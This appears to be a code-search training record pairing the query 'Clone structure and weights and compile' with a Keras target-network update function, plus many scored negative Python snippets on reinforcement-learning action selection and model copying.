"def __ExecuteActionForRandomAgentWithNoisyTransitionModel__(self, idx_request_action, noise_level):\n n = len(self.AGENT_ALLOWED_ACTIONS)\n pp = noise_level/(n-1) * np.ones((n,1))\n pp[idx_request_action] = 1.0 - noise_level\n idx_actual = np.random.choice(n, 1, p=pp.flatten()) # sample from the distrbution of actions\n actual_action = self.AGENT_ALLOWED_ACTIONS[int(idx_actual)]\n self.agent_host.sendCommand(actual_action)\n self.solution_report.addAction()\n return actual_action", "def choose_action(self, observation):\r\n observation = T.unsqueeze(T.FloatTensor(observation), 0)\r\n # Epsilon-greedy policy\r\n if np.random.uniform() < self.epsilon: \r\n # Get all of the Q values for the current state (forward prop)\r\n actions_value = self.Q_eval.forward(observation)\r\n\r\n # Take the optimal action \r\n action = T.max(actions_value, 1)[1].data.numpy()\r\n action = action[0] if self.action_space == 0 else action.reshape(self.action_space) # return the argmax index\r\n else: \r\n # Choose a random action in the action space list\r\n action = np.random.randint(0, self.num_actions)\r\n action = action if self.action_space == 0 else action.reshape(self.action_space)\r\n\r\n return action", "def sampleAction(self, game_info):\n pState = torch.Tensor(game_info['p_state'])\n legalActions = torch.Tensor(game_info['legal_actions'])\n action = self.policy.sampleAction(pState, legalActions)\n return action", "def random_play(state, player):\n import random\n actions = YoteRules.get_player_actions(state, player, reward_move=state.rewarding_move)\n choice = random.choice(actions)\n return choice", "def select_action(policy, state):\n state = torch.from_numpy(state).long().unsqueeze(0)\n state = torch.zeros(3,9).scatter_(0,state,1).view(1,27)\n pr = policy(Variable(state))\n m = torch.distributions.Categorical(pr)\n action = m.sample()\n log_prob = torch.sum(m.log_prob(action))\n return action.data[0], log_prob", "def randomize_next_action(self, actions, player):\n if not actions: return\n action_count = len(actions) - 1\n action_index = randint(0, action_count)\n actions[action_index](self, player)", "def select_action(images, n_actions, device, eps_threshold=-1):\n actions = []\n\n for i in images:\n if eps_threshold == -1:\n actions.append(torch.tensor([[random.randrange(n_actions)]], device=device, dtype=torch.long))\n else:\n sample = random.random()\n if sample > eps_threshold:\n with torch.no_grad():\n # t.min(1) will return smallest column value of each row.\n # second column on min result is index of where min element was\n # found, so we pick action with the lower expected reward.\n actions.append(policy_net(i.unsqueeze(0)).min(1)[1].view(1, 1))\n else:\n actions.append(torch.tensor([[random.randrange(n_actions)]], device=device, dtype=torch.long))\n\n return torch.tensor(actions, device=device)", "def choose_action(self, state):\n if random.random() < self.e_greedy_prob:\n # randomly select action from state\n action = np.random.choice(len(self.q_val_table[state]))\n else:\n # greedily select action from state\n action = np.argmax(self.q_val_table[state])\n return action", "def sample_action(self, init=False): \n # selecting a_t at random\n current_state = self.state\n if (init):\n current_state = 0\n possible_actions = np.array(self.A[current_state])\n possible_actions = possible_actions[possible_actions != -1]\n if (len(possible_actions) == 0):\n self.action_choice = -2\n return\n\n choice = np.random.choice(possible_actions)\n self.action_choice = choice\n action = self.get_action_from_col(choice)\n\n robot_action = RobotMoveDBToBlock()\n robot_action.robot_db = convert_color_to_str(\n action[0]) # \"red\", \"green\", \"blue\"\n robot_action.block_id = action[1] # 1, 2, 3\n self.robot_action_pub.publish(robot_action)", "def act(self,observation):\n maximum_actions = np.argwhere(self.q_table[observation] == np.amax(self.q_table[observation])).flatten()\n return(np.random.choice(maximum_actions))", "def choose_action(self, agent_data):\r\n action_value_estimates = agent_data[\"action_value_estimates\"]\r\n roll = random.uniform(0,1)\r\n if roll <= self.epsilon:\r\n action = random.choice( list( range(0,len(action_value_estimates))))\r\n else:\r\n action = self.argmax_with_random_tiebreaker(action_value_estimates)\r\n return action", "def select_action(self, q_values):\n assert q_values.ndim == 1\n q_values = q_values.astype('float64')\n nb_actions = q_values.shape[0]\n\n exp_values = np.exp(np.clip(q_values / self.tau, self.clip[0], self.clip[1]))\n probs = exp_values / np.sum(exp_values)\n action = np.random.choice(range(nb_actions), p=probs)\n log.info(f\"Chosen action by keras-rl {action} - probabilities: {probs}\")\n return action", "def choose_action(self, board):\n options = board.empty_cells\n # to allow exploration, have a small probability of a random move\n p_random = random.random()\n # if the state is not in the table add it\n if (self.sign, board.state) not in self.Q_table.keys() or p_random < self.epsilon:\n values = {}\n for option in options:\n values[option] = random.random()\n self.Q_table[(self.sign, board.state)] = values\n self.action = random.choice(options)\n else:\n values = self.Q_table[(self.sign, board.state)]\n action = max(values, key=values.get)\n self.action = action\n\n # decrease exploration after each action\n if self.epsilon > 0:\n self.epsilon -= 0.0001\n\n return self.action", "def actionSelector(self): \n if self.Temp!=0:\n if len(self.lessons) > 60 and self.var_T: \n # if the agent haven't already gotten food since a certain time \n # we increase the temperature by 0.001 \n if self.count_without_food>12:\n self.Temp += 0.01 \n if self.Temp>=(self.var_T[0]): \n self.Temp = self.var_T[0] \n # otherwise we decrease the temperatur by 0.001 \n else: \n self.Temp -= 0.001\n if self.Temp <= (self.var_T[-1]):\n self.Temp = self.var_T[-1]\n \n s = np.sum([np.exp(float(k)/self.Temp) for k in self.U_list])\n\n self.action_proba =[np.exp(float(m)/self.Temp)/s for m in self.U_list]\n action = np.random.choice(np.arange(4),p=self.action_proba) # choice a random choice relating to the probability distribution given by the softmax algorith \n else:\n action = np.argmax(self.U_list)\n return action", "def getAction(self, state):\n # Pick Action\n legalActions = self.getLegalActions(state)\n if len(legalActions) == 0:\n return None\n elif util.flipCoin(self.epsilon):\n return random.choice(legalActions)\n else:\n return self.getPolicy(state)", "def choose_action(self, state):\n if random.random() < self.explore:\n action = random.choice(list(self.Q[state].keys()))\n else:\n action = self._best_action(state)\n\n # learn from the previous action, if there was one\n self._learn(state)\n\n # remember this state and action\n self.prev = (state, action)\n\n return action", "def select_action(self, state, epsilon=None):\n if epsilon == None:\n epsilon = self.epsilon\n \n if np.random.random() > epsilon:\n # greedy action selection\n return self.get_optimal_action(state)\n \n else:\n # random action selection\n return np.random.randint(0, self.num_actions)", "def choose_action(self, game_state):\n util.raise_not_defined()", "def choose_action(q_table: np.ndarray, state: int,\n exploration_rate: float) -> int:\n random_value = random.uniform(0, 1)\n if random_value > exploration_rate:\n action = best_action(q_table, state)\n else:\n num_actions = q_table.shape[1]\n action = random.randint(0, num_actions-1)\n return action", "def select_action(engine, observation):\n with torch.no_grad():\n dqn.eval()\n if torch.rand(1).item() < epsilon:\n return random_action(observation)\n else:\n return dqn(observation).greedy()", "def takeAction(self, state):\n # go greedy or not?\n if random.uniform(0, 1) < self.epsilon:\n # greedy selection\n # find best action\n allActions = torch.stack(\n tuple(torch.cat((state.strengths, state.focus, changes)) for changes in self.actionSet))\n evaluation = self.q.evaluateBunch(allActions)\n action = Action(state, self.actionSet[evaluation.argmax()])\n return action\n else:\n # random selection\n return Action(state, random.choice(self.actionSet))", "def pick_action(self, observation):\n if np.random.rand() < self.epsilon:\n action = np.random.randint(self.n_arm) # 从n个arm中随机选择一个\n else: # 1-epsilon greedy\n # 所谓reward, 就是success平均值\n posterior_means = self.get_posterior_mean() # shape:[arm, 1], 从中选择一个reward最大的arm\n action = random_argmax(posterior_means)\n\n return action", "def action_space_sample(self):\n return np.random.choice(self.possible_actions)", "def choose_action( self):\n \"\"\"greedy, random, e-greedy, boltzmann, bayesian\"\"\"\n\tif self.exploration == \"greedy\":\n #Choose an action with the maximum expected value.\n a,allQ = sess.run([q_net.predict,q_net.Q_out],feed_dict={q_net.inputs:[s],q_net.keep_per:1.0})\n a = a[0]\n return a\n if self.exploration == \"random\":\n #Choose an action randomly.\n a = env.action_space.sample()\n if self.exploration == \"e-greedy\":\n #Choose an action by greedily (with e chance of random action) from the Q-network\n if np.random.rand(1) < e or total_steps < pre_train_steps:\n a = env.action_space.sample()\n else:\n a,allQ = sess.run([q_net.predict,q_net.Q_out],feed_dict={q_net.inputs:[s],q_net.keep_per:1.0})\n a = a[0]\n return a\n if self.exploration == \"boltzmann\":\n #Choose an action probabilistically, with weights relative to the Q-values.\n Q_d,allQ = sess.run([q_net.Q_dist,q_net.Q_out],feed_dict={q_net.inputs:[s],q_net.Temp:e,q_net.keep_per:1.0})\n a = np.random.choice(Q_d[0],p=Q_d[0])\n a = np.argmax(Q_d[0] == a)\n return a\n if self.exploration == \"bayesian\":\n #Choose an action using a sample from a dropout approximation of a bayesian q-network.\n a,allQ = sess.run([q_net.predict,q_net.Q_out],feed_dict={q_net.inputs:[s],q_net.keep_per:(1-e)+0.1})\n a = a[0]\n return a", "def obtain_action(self, timestep):\r\n\t\treturn random.randint(0, self.num_actions-1)", "def chooseAction(self, gameState):\n actions = gameState.getLegalActions(self.index)\n\n # You can profile your evaluation time by uncommenting these lines\n # start = time.time()\n opIndices = self.getOpponents(gameState)\n opStates = [gameState.getAgentState(i) for i in opIndices]\n opCarry = [x.numCarrying for x in opStates]\n \n if max(opCarry) >= 5:\n self.isOffensive = False\n else:\n self.isOffensive = True\n\n values = [self.evaluate(gameState, a) for a in actions]\n # print 'eval time for agent %d: %.4f' % (self.index, time.time() - start)\n\n maxValue = max(values)\n bestActions = [a for a, v in zip(actions, values) if v == maxValue]\n\n\n\n # print if get eaten\n myPos = gameState.getAgentPosition(self.index)\n prevGameState = self.getPreviousObservation()\n if prevGameState is not None:\n\n previousPos = prevGameState.getAgentPosition(self.index)\n if self.getMazeDistance(myPos, previousPos) > 1:\n print(\"prePostion\",previousPos)\n print()\n previousLegalAction = prevGameState.getLegalActions(self.index)\n print([(self.evaluate(prevGameState, a), a) for a in previousLegalAction])\n print()\n print(self.getNonScaredGhostPos(prevGameState))\n print()\n print()\n\n\n return random.choice(bestActions)", "def __call__(self, state, q_values):\n\n if self.policy_type == \"greedy\":\n is_greedy = True\n else:\n is_greedy = random.uniform(0, 1) > self.epsilon\n\n if is_greedy :\n # choose greedy action\n index_action = np.argmax(q_values[state])\n else:\n # get a random action\n index_action = random.randint(0,3)\n\n return actions_dict[index_action]" ]
[ "0.7818525", "0.77571136", "0.7665768", "0.76560175", "0.7534476", "0.7534476", "0.7523864", "0.750895", "0.750895", "0.7486864", "0.74745595", "0.74528134", "0.7383261", "0.7376664", "0.7366769", "0.73616487", "0.732289", "0.73151815", "0.7300658", "0.72869414", "0.72837925", "0.72723657", "0.72645056", "0.72593266", "0.72425556", "0.7240141", "0.7240141", "0.7225282", "0.72009397", "0.71916306", "0.7188073", "0.71788627", "0.7169325", "0.7166236", "0.7138948", "0.712279", "0.7118252", "0.71179426", "0.71109265", "0.70955706", "0.7051368", "0.7049614", "0.7031613", "0.7014944", "0.69872606", "0.69861925", "0.6963253", "0.6962935", "0.69480366", "0.6940143", "0.69376624", "0.6937322", "0.6923691", "0.69222194", "0.6910532", "0.69093573", "0.6907853", "0.6899498", "0.6883045", "0.68811685", "0.6873736", "0.6856543", "0.6852671", "0.68509996", "0.68189394", "0.6789621", "0.6772299", "0.6744871", "0.674378", "0.674264", "0.67426205", "0.6741289", "0.67317617", "0.67304605", "0.6727009", "0.67241234", "0.67085814", "0.67034686", "0.6695554", "0.6693656", "0.6691104", "0.66864604", "0.6686382", "0.6683038", "0.66725206", "0.6671215", "0.66661584", "0.6659483", "0.6657348", "0.665007", "0.66390526", "0.663864", "0.6632994", "0.66326165", "0.66298074", "0.6625559", "0.66239756", "0.6612138", "0.66105", "0.6609644" ]
0.7174809
32
Clone structure and weights and compile
def update_target_network(self): self.target_Qmodel = clone_model(self.Qmodel) self.target_Qmodel.set_weights(self.Qmodel.get_weights()) # target network is never compiled self.target_Qmodel.compile(loss='mse', optimizer=Adam())
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def meta_clone(self, include_buffers=False):\n if include_buffers:\n self.buffers_clone = {k: v.data.clone()\n for k, v in self.named_buffers()}\n self.params_clone = {k: v.data.clone()\n for k, v in self.named_parameters()}\n self.grad_clone = {k: torch.zeros_like(v.data)\n for k, v in self.named_parameters()}\n self.grad_count = 0", "def copy(self):\n copyPreprocessors = []\n copyModels = []\n try:\n #package is defined here once and passed to _cloneObject.\n #When further modules are required, further imports will be necessary\n moduleObject = {\"sklearn\": importlib.import_module(\"sklearn.base\")}\n except(ImportError):\n moduleObject = None\n for preprocessor in self.preprocessors:\n copyPrep = self._cloneObject(preprocessor, moduleObject=moduleObject)\n copyPreprocessors.append(copyPrep)\n\n for model in self.models:\n copyModel = self._cloneObject(model, moduleObject=moduleObject)\n copyModels.append(copyModel)\n return Layer(models=copyModels, preprocessors=copyPreprocessors)", "def __init__(self, structure):\n # weight matrices\n self.ws = [np.random.randn(m, n) for n, m in zip([0] + structure, structure)]\n # biases\n self.bs = [np.random.rand(n, 1) for n in structure]\n # activations\n self.ys = [np.zeros((n, 1)) for n in structure]\n # z values\n self.zs = [np.zeros((n, 1)) for n in structure]", "def __copy__(self):\n #new = MCTS(copy=True) # don't run _predict() twice\n new = MCTS(self.env, copy=True) # don't set pi and Q twice\n new.env = self.env.__copy__()\n # can't use __dict__.update() without effecting env __copy__()\n # in theory, you don't need to copy the env. just use one copy for simulating, and restore it to root\n # since _Q() evaluates the env.done() of children, you need self.done = env.done() in __init__()\n # same for env.winner\n new.pi = []\n new. Q = 0\n new.net = self.net\n new.t = self.t\n new.expl = self.expl\n new.children = []\n new.parent = None\n return new", "def mutate(self):\n \n # Mutate each weight\n self.w1 = self.w1 + np.random.normal(0, 1, 8).reshape((2,4))\n self.b1 = self.b1 + np.random.normal(0, 1, 2).reshape((2,1))\n self.w2 = self.w2 + np.random.normal(0, 1, 4).reshape((2,2))\n self.b2 = self.b2 + np.random.normal(0, 1, 2).reshape((2,1))\n self.w3 = self.w3 + np.random.normal(0, 1, 2).reshape((1,2))\n self.b3 = self.b3 + np.random.normal(0, 1, 1)\n \n # Return thyself\n return self", "def copy(self):\n model_copy = BayesianModel()\n model_copy.add_nodes_from(self.nodes())\n model_copy.add_edges_from(self.edges())\n if self.cpds:\n model_copy.add_cpds(*[cpd.copy() for cpd in self.cpds])\n return model_copy", "def clone(self):", "def __init__(self, structure, weights = [], activationType = \"sigmoid\"):\n self.weights = []\n self.activationType = activationType\n self.activations = []\n self.derivatives = []\n self.delta = []\n self.bias = []\n\n #Either randomises weights or uses starting weights that have been supplied. \n for i in range(len(structure)-1):\n if len(weights) != 0:\n w = np.zeros((structure[i], structure[i + 1]))\n for j in range(structure[i]):\n w[j, :] = weights[(j * structure[i + 1]) : (j * structure[i + 1]) + structure[i + 1]]\n else:\n w = np.random.rand(structure[i], structure[i + 1])\n self.weights.append(w)\n \n #Initialises activations array, delta array and bias array. \n for i in range(len(structure)):\n a = np.zeros(structure[i])\n self.activations.append(a)\n self.delta.append(a)\n self.bias.append(a)\n \n \n #Initialises derivatives array.\n for i in range(len(structure) - 1):\n d = np.zeros((structure[i], structure[i + 1]))\n self.derivatives.append(d)\n \n return", "def copy(self, shareWeights):\n newNode = SparseLinear(self.inputDim, self.outputDim, self.stdv)\n #newNode.receiveGradFrom = self.receiveGradFrom[:]\n #newNode.receiveInputFrom = self.receiveInputFrom[:]\n if shareWeights:\n newNode.weight = self.weight\n newNode.gradWeight = self.gradWeight\n newNode.bias = self.bias\n newNode.gradBias = self.gradBias\n return newNode", "def compile(self):\n self.train = self._make_train()\n self.loss_test = self._make_loss_test()\n self.predict = self._make_predict()", "def build(self):\n\n self.W_AA = self.init([self.n_atom_input_feat, self.n_hidden_AA])\n self.b_AA = model_ops.zeros(shape=[\n self.n_hidden_AA,\n ])\n\n self.W_PA = self.init([self.n_pair_input_feat, self.n_hidden_PA])\n self.b_PA = model_ops.zeros(shape=[\n self.n_hidden_PA,\n ])\n\n self.W_A = self.init([self.n_hidden_A, self.n_atom_output_feat])\n self.b_A = model_ops.zeros(shape=[\n self.n_atom_output_feat,\n ])\n\n self.trainable_weights = [\n self.W_AA, self.b_AA, self.W_PA, self.b_PA, self.W_A, self.b_A\n ]\n if self.update_pair:\n self.W_AP = self.init([self.n_atom_input_feat * 2, self.n_hidden_AP])\n self.b_AP = model_ops.zeros(shape=[\n self.n_hidden_AP,\n ])\n\n self.W_PP = self.init([self.n_pair_input_feat, self.n_hidden_PP])\n self.b_PP = model_ops.zeros(shape=[\n self.n_hidden_PP,\n ])\n\n self.W_P = self.init([self.n_hidden_P, self.n_pair_output_feat])\n self.b_P = model_ops.zeros(shape=[\n self.n_pair_output_feat,\n ])\n\n self.trainable_weights.extend(\n [self.W_AP, self.b_AP, self.W_PP, self.b_PP, self.W_P, self.b_P])", "def copy(self):\n brain = Brain((self.structure), activation_function=self.activation_function)\n brain.weights = copy.deepcopy(self.weights)\n brain.biases = copy.deepcopy(self.biases)", "def build(self):\n\n self.W = self.init([self.n_atom_input_feat, self.n_output])\n self.b = model_ops.zeros(shape=[\n self.n_output,\n ])\n\n self.trainable_weights = self.W + self.b", "def copy(self):\n return self.__class__(\n self.kind, self.link_ids.copy(), self.included_nodes.copy(), self.mass,\n self.name, self.crossring_cleavages.copy(), self.composition.copy())", "def test_BuildModel1(self):\n print(\"\\nTest 5: Building a Model with cloning\")\n builder = StaticBuilder(\"Clone\")\n in1 = builder.addInput(10)\n enc1 = builder.addInner(3)\n out1 = builder.addOutput(name=\"Out1\")\n out2 = builder.addOutput(name=\"Out2\")\n \n builder.addDirectedLink(in1, enc1)\n builder.addDirectedLink(enc1, out1)\n builder.addDirectedLink(enc1, out2)\n \n builder.build()", "def init_structure(self):\n dest = os.path.join(self.cwd, 'build', 'debian')\n self.mkdir_p(dest)\n struct = os.path.join(dest, self.cwd)\n self.mkdir_p(struct)\n# copytree_src = os.path.join(self.cwd, 'DEBIAN')\n# self.copytree(copytree_src, dest, symlinks=False, ignore=None)\n\n new_dest = os.path.join(dest, self.cwd[1:])\n self.copytree(\n self.cwd,\n new_dest,\n symlinks=False,\n ignore=self.ignore\n )", "def copy(self):\n model = LBM(\n n_row_clusters=self.n_row_clusters,\n n_column_clusters=self.n_column_clusters,\n max_iter=self.max_iter,\n n_init=self.n_init,\n n_init_total_run=self.n_init_total_run,\n n_iter_early_stop=self.nb_iter_early_stop,\n rtol=self.rtol,\n atol=self.atol,\n verbosity=self.verbosity,\n use_gpu=self.use_gpu,\n gpu_index=self.gpu_index,\n )\n model._nb_rows = self._nb_rows\n model._nb_cols = self._nb_cols\n model.loglikelihood_ = self.loglikelihood_\n model._np = self._np\n model._cupyx = self._cupyx\n model.trained_successfully_ = self.trained_successfully_\n model.pi_ = copy.copy(self.pi_)\n model.alpha_1_ = copy.copy(self.alpha_1_)\n model.alpha_2_ = copy.copy(self.alpha_2_)\n model.tau_1_ = copy.copy(self.tau_1_)\n model.tau_2_ = copy.copy(self.tau_2_)\n return model", "def copy(self):\n new = self.__class__()\n do_not_copy_by_ref = {\"alleles\", \"strains\", \"base_cobra_model\", \"notes\",\n \"annotation\"}\n for attr in self.__dict__:\n if attr not in do_not_copy_by_ref:\n new.__dict__[attr] = self.__dict__[attr]\n new.notes = deepcopy(self.notes)\n new.annotation = deepcopy(self.annotation)\n\n new.alleles = DictList()\n do_not_copy_by_ref = {\"_strains\", \"_model\"}\n for allele in self.alleles:\n new_allele = allele.__class__()\n for attr, value in iteritems(allele.__dict__):\n if attr not in do_not_copy_by_ref:\n new_allele.__dict__[attr] = copy(\n value) if attr == \"formula\" else value\n new_allele._model = new\n new.alleles.append(new_allele)\n\n new.strains = DictList()\n do_not_copy_by_ref = {\"_model\", \"_alleles\", \"_base_cobra_model\"}\n for strain in self.strains:\n new_strain = strain.__class__()\n for attr, value in iteritems(strain.__dict__):\n if attr not in do_not_copy_by_ref:\n new_strain.__dict__[attr] = copy(value)\n new_strain._model = new\n new.strains.append(new_strain)\n # update awareness\n for allele, stoic in iteritems(strain._alleles):\n new_allele = new.alleles.get_by_id(allele.id)\n new_strain._alleles[new_allele] = stoic\n new_allele._strain.add(new_strain)\n # it doesn't make sense to retain the context of a copied model so\n # assign a new empty context\n new._contexts = list()", "def _use_copy(self):\n self.mx_states = (\n [] if not self.copy_states else [self.ocp.nlp[self.nlp.use_states_from_phase_idx].states[0][self.name].mx]\n )\n self.mx_states_dot = (\n []\n if not self.copy_states_dot\n else [self.ocp.nlp[self.nlp.use_states_dot_from_phase_idx].states_dot[0][self.name].mx]\n )\n self.mx_controls = (\n []\n if not self.copy_controls\n else [self.ocp.nlp[self.nlp.use_controls_from_phase_idx].controls[0][self.name].mx]\n )\n self.mx_stochastic = []\n\n # todo: if mapping on variables, what do we do with mapping on the nodes\n for i in self.nlp.variable_mappings[self.name].to_second.map_idx:\n var_name = (\n f\"{'-' if np.sign(i) < 0 else ''}{self.name}_{self.name_elements[abs(i)]}_MX\"\n if i is not None\n else \"zero\"\n )\n\n if not self.copy_states:\n self.mx_states.append(MX.sym(var_name, 1, 1))\n\n if not self.copy_states_dot:\n self.mx_states_dot.append(MX.sym(var_name, 1, 1))\n\n if not self.copy_controls:\n self.mx_controls.append(MX.sym(var_name, 1, 1))\n\n self.mx_stochastic.append(MX.sym(var_name, 1, 1))\n\n self.mx_states = vertcat(*self.mx_states)\n self.mx_states_dot = vertcat(*self.mx_states_dot)\n self.mx_controls = vertcat(*self.mx_controls)\n self.mx_stochastic = vertcat(*self.mx_stochastic)", "def clone(self):\n cloned_self = BlockMovementEnv(self.config, self.speed, name = self.name, \n progress_estimator = self.progress_estimator, graph_size = self.graph_size, \n session = self.session, reset = False)\n for o in self.start_config:\n cloned_self.add_object(o)\n\n for object_index, _, next_transform, _, _, _, action_means, action_stds in self.action_storage: \n action = (object_index, next_transform.get_feat(), action_means, action_stds)\n cloned_self.step(action)\n\n return cloned_self", "def __deepcopy__(self, memodict={}):\n return Node(deepcopy(self.location), self.weight)", "def deep_copy(self):\n return self.__class__(self.inputs, self.outputs, self.middle)", "def copy(self):\n new_model = Model(\n name=self.name,\n functions=copy.deepcopy(self.functions),\n domain=self.domain.copy(),\n density=self.density.copy(),\n )\n new_model.update()\n\n return new_model", "def deepcopy(self):\r\n newNN = NeuralNetwork(self.max_epochs, self.loss, self.metric, self.momentum_rate,\r\n self.regularization_rate, self.type, self.batch_size, self.type_classifier)\r\n [newNN.add_layer(layer.deepcopy()) for layer in self.layers]\r\n return newNN", "def clone(self, clone=None):\r\n # copy specs from supplied object\r\n if clone is not None: [setattr(self, v, getattr(clone, v)) for v in vars(clone)]", "def clone(self):\n return self.__class__(self, self.spectrum, wallet=self.wallet)", "def copy_weights(self):\n return copy.deepcopy(self.weights_ih), copy.deepcopy(self.weights_ho)", "def clone(self, **kwargs):\n return attr.evolve(self, **kwargs)", "def __init__(self, weights:np.ndarray):\n self.w = weights.copy()", "def compile(self):\n self.model = compile_model(self.model_filename, include_paths = self.include_paths)\n self.simulation = compile_model(self.sim_filename, include_paths = self.include_paths)", "def clone(self):\n # make copies of my state\n beta = self.beta\n theta = self.theta.clone()\n sigma = self.sigma.clone()\n likelihoods = self.prior.clone(), self.data.clone(), self.posterior.clone()\n\n # make one and return it\n return type(self)(beta=beta, theta=theta, likelihoods=likelihoods, sigma=sigma)", "def copy(self):\n new_ann = ForwardArtificialNeuralNectwork(self.dim_in-1, self.dim_hid, self.dim_out)\n new_ann.weight[:,:] = self.weight\n new_ann.connectivity[:,:] = self.connectivity\n new_ann.hidden[:] = self.hidden\n return new_ann", "def build(self,input_shape):\n\n self.w = self.add_weight(shape=(input_shape[-1],self.units),\n initializer='random_normal',\n trainable=True)\n self.b = self.add_weight(shape=(self.units,),\n initializer='random_normal',\n trainable=True)", "def clone(self):\n return _libsbml.FbcAnd_clone(self)", "def __copy__(self) :\n return self.build(self.scope.copy(), self.scope_vids.copy(), np.array(self.table))", "def __deepcopy__(self, memodict={}):\n nodes = [deepcopy(n) for n in self.nodes]\n return Network(nodes)", "def clone(self):\n raise NotImplementedError", "def clone(self, first_order=None, allow_unused=None, allow_nograd=None):\n if first_order is None:\n first_order = self.first_order\n if allow_unused is None:\n allow_unused = self.allow_unused\n if allow_nograd is None:\n allow_nograd = self.allow_nograd\n return MAMLpp(\n clone_module(self.module),\n lr=self.lr,\n lrs=clone_named_parameters(self.lrs),\n first_order=first_order,\n allow_unused=allow_unused,\n allow_nograd=allow_nograd,\n )", "def copy(self):\r\n clone = NeuralNetLayer(self.input_size, self.output_size)\r\n clone.weights = self.weights.copy()\r\n return clone", "def clone(self):\n return attr.evolve(self)", "def clone(self):\n return attr.evolve(self, env=dict(self._env))", "def clone(self):\r\n cp = self.__class__(self.op, self.inputs, [output.clone() for output in self.outputs])\r\n cp.tag = copy(self.tag)\r\n return cp", "def copy(self):\r\n clone = NeuralNet()\r\n for layer in self.layers:\r\n clone.layers.append(layer.copy())\r\n return clone", "def test_deepcopy(self):\n t = Compose([Enumerate([2, \"asfa\", \"ipsi\"]), OneHotEncode(3)], \"categorical\")\n t.transform([2])\n copy.deepcopy(t)", "def copy_para(from_model, to_model):\n for i, j in zip(from_model.trainable_weights, to_model.trainable_weights):\n j.assign(i)", "def __deepcopy__(self, memo):\r\n new_inst = super().__deepcopy__(memo)\r\n new_inst.road_width = self.road_width\r\n new_inst.road_length = self.road_length\r\n new_inst.surface = self.surface\r\n \r\n return new_inst", "def constructCell():\n\t\tself.weightGenerate()", "def clone(self):\n sc=copy.copy(self)\n sc.farms=list()\n for f in self.farms:\n sc.farms.append(f.clone(f.name, f.size))\n sc.airborne=list()\n for a in self.airborne:\n sc.airborne.append(a.clone(a.farma, a.farmb, a.distance))\n return sc", "def hard_copy_weights(self, target, source):\n for target_param, param in zip(target.parameters(), source.parameters()):\n target_param.data.copy_(param.data)", "def __init__(self, weights, path, trained, asGraph):\n \n _weights = np.asarray(weights)\n\n numLayers = int(_weights.shape[0]/2)\n wghts = []\n biases = []\n\n for i in range(numLayers):\n j = 2*i\n# print(j,(_weights[j].T).shape)\n wghts.append(_weights[j])\n j = 2*i + 1\n# print(j,(_weights[j].T).shape)\n biases.append(_weights[j])\n #enddo\n\n self.numLayers = numLayers\n self.wghts = np.asarray(wghts)\n self.asGraph = asGraph\n self.wghts = wghts\n self.path = path\n self.trained = trained", "def clone(self):\n return _libsbml.ModelCreator_clone(self)", "def prepare_weights(self, hs, negative, wv, docvecs, update=False):\n # set initial input/projection and hidden weights\n if not update:\n self.reset_weights(hs, negative, wv, docvecs)\n else:\n self.update_weights(hs, negative, wv)", "def build(self, weight = 0.5):\n \n self.weight = weight\n \n # Defining weighting matrixes\n self.processing_fw = torch.randn((self._hidden_size, self._expansion_size), requires_grad = True).to(self.device)\n self.processing_bw = torch.randn((self._hidden_size, self._expansion_size), requires_grad = True).to(self.device)\n self.processing_last_ht = torch.randn((self._hidden_size*2, self._hidden_size*2), requires_grad = True).to(self.device)\n \n # These will only be applied to the intermediate hidden states\n self.linear_fw = nn.Linear(self._seqlen - 1, 1).to(self.device)\n self.linear_bw = nn.Linear(self._seqlen - 1, 1).to(self.device)\n \n self.compression = torch.randn((self._expansion_size*2, self._hidden_size*2), requires_grad = True).to(self.device)\n \n if self._activation_fn == 'tanh' or isinstance(self._activation_fn, torch.nn.modules.activation.Tanh):\n self._activation_fn = nn.Tanh()\n elif self._activation_fn == 'sigmoid' or isinstance(self._activation_fn, torch.nn.modules.activation.Sigmoid):\n self._activation_fn = nn.Sigmoid()\n elif self._activation_fn == 'leaky ReLU' or isinstance(self._activation_fn, torch.nn.modules.activation.LeakyReLU):\n self._activation_fn = nn.LeakyReLU()\n else:\n raise ValueError('Non-linear activation function must be \"tanh\", \"sigmoid\" or \"leaky ReLU\"')\n \n # Passing it onto the relevant device\n self._activation_fn = self._activation_fn.to(self.device)", "def copyWeights(self, shp, stray = 0, colour = (240,100,100)):\n self.weights = []\n self.bias = []\n if(stray == 0): # straight copy\n for i, wt in enumerate(shp.weights):\n self.weights.append(wt.copy())\n for i,bs in enumerate(shp.bias):\n self.bias.append(bs.copy())\n else: # Copy with some random added in\n for i, wt in enumerate(shp.weights):\n self.weights.append(np.add(wt.copy(), np.random.normal(0,stray,(shp.dimensions[i],shp.dimensions[i+1]))))\n for i,bs in enumerate(shp.bias):\n self.bias.append(np.add(bs.copy(), np.random.normal(0,stray,shp.dimensions[i+1])))\n self.normalizeWeights()\n self.colour = colour\n self.parentname = shp.name\n self.parentcolour = shp.colour\n self.setDimension(shp.inputdistance,shp.inputangle,shp.intermediates,shp.orders)", "def copy(self):\n edges, weights = [], []\n \n # This is a microoptimization\n edges_append = edges.append\n weights_append = weights.append\n \n for edge, weight in self.edges(and_weights=True):\n edges_append(edge)\n weights_append(weight)\n \n return type(self)(edges, weights)", "def DontuseThis():\n BCM_outputs = ['phi','rho','theta',\n 'r_probabilityMaps','l_probabilityMaps',\n 'models']\n BCM_Models = pe.Node(interface=nio.DataGrabber(input_names=['structures'],\n outfields=BCM_outputs),\n name='10_BCM_Models')\n BCM_Models.inputs.base_directory = atlas_fname_wpath\n BCM_Models.inputs.template_args['phi'] = [['spatialImages','phi','nii.gz']]\n BCM_Models.inputs.template_args['rho'] = [['spatialImages','rho','nii.gz']]\n BCM_Models.inputs.template_args['theta'] = [['spatialImages','theta','nii.gz']]\n BCM_Models.inputs.template_args['r_probabilityMaps'] = [['structures']]\n BCM_Models.inputs.template_args['l_probabilityMaps'] = [['structures']]\n BCM_Models.inputs.template_args['models'] = [['structures']]\n\n BRAINSCut_structures = ['caudate','thalamus','putamen','hippocampus']\n #BRAINSCut_structures = ['caudate','thalamus']\n BCM_Models.iterables = ( 'structures', BRAINSCut_structures )\n BCM_Models.inputs.template = '%s/%s.%s'\n BCM_Models.inputs.field_template = dict(\n r_probabilityMaps='probabilityMaps/r_%s_ProbabilityMap.nii.gz',\n l_probabilityMaps='probabilityMaps/l_%s_ProbabilityMap.nii.gz',\n models='modelFiles/%sModel*',\n )\n\n \"\"\"\n The xml creation and BRAINSCut need to be their own mini-pipeline that gets\n executed once for each of the structures in BRAINSCut_structures. This can be\n accomplished with a map node and a new pipeline.\n 